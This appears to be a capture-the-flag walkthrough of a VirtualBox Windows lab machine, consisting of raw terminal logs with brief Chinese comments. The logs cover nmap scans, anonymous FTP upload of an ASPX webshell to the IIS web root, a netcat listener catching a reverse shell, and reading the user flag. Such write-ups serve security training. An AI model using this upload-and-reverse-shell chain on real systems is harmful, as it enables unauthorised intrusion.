nmap -sT -min-rate 10000 -p- 192.168.56.6 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-03 07:14 EST Warning: 192.168.56.6 giving up on port because retransmission cap hit (10). Nmap scan report for192.168.56.6 Host is up (0.00034s latency). Not shown: 64843 closed tcp ports (conn-refused), 680 filtered tcp ports (no-response) PORT STATE SERVICE 21/tcp open ftp 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 5357/tcp open wsdapi 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49156/tcp open unknown 49157/tcp open unknown MAC Address: 08:00:27:61:C2:6F (Oracle VirtualBox virtual NIC)
nmap -sT -sV -O -p 21,80,135,139,445,5357192.168.56.6 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-03 07:15 EST Nmap scan report for192.168.56.6 Host is up (0.00050s latency).
PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd 80/tcp open http Microsoft IIS httpd 7.5 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) MAC Address: 08:00:27:61:C2:6F (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Microsoft Windows 7|2008|8.1 OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1 OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 Network Distance: 1 hop Service Info: Host: QUOTED-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 19.21 seconds
nmap -script=vuln -p 21,80,135,139,445,5357192.168.56.6 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-03 07:17 EST Nmap scan report for192.168.56.6 Host is up (0.00056s latency). PORT STATE SERVICE 21/tcp open ftp 80/tcp open http |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 5357/tcp open wsdapi MAC Address: 08:00:27:61:C2:6F (Oracle VirtualBox virtual NIC) Host script results: |_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED |_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED |_smb-vuln-ms10-054: false
ftp 192.168.56.6 Connected to 192.168.56.6. 220 Microsoft FTP Service Name(192.168.56.6:root): anonymous 331 Anonymous access allowed, send identity(e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> dir 229 Entering Extended Passive Mode(|||49158|) 125 Data connection already open; Transfer starting. 10-05-2411:16AM <DIR> aspnet_client 10-04-2411:27PM 689 iisstart.htm 10-04-2411:27PM 184946 welcome.png 226 Transfer complete. ftp> mget *
ftp> put 4.aspx local: 4.aspx remote: 4.aspx 229 Entering Extended Passive Mode(|||49159|) 125 Data connection already open; Transfer starting. 100% |*****************************************************************| 1597113.53 MiB/s --:-- ETA 226 Transfer complete. 15971 bytes sent in 00:00 (5.85 MiB/s)
nc监听,然后curl上传的ASP马,成功反弹回来shell
1 2 3 4 5 6 7 8 9
nc -lvp 1234 listening on [any] 1234 ... 192.168.56.6: inverse host lookup failed: Unknown host connect to [192.168.56.4] from (UNKNOWN) [192.168.56.6] 49160 Spawn Shell... Microsoft Windows [Srm 6.1.7601] Telif Hakk(c) 2009 Microsoft Corporation. Tm haklar sakldr.
c:\windows\system32\inetsrv>
首先读取用户的flag
1 2 3
c:\Users\quoted\Desktop>type user.txt type user.txt HMV{User_Flag_Obtained}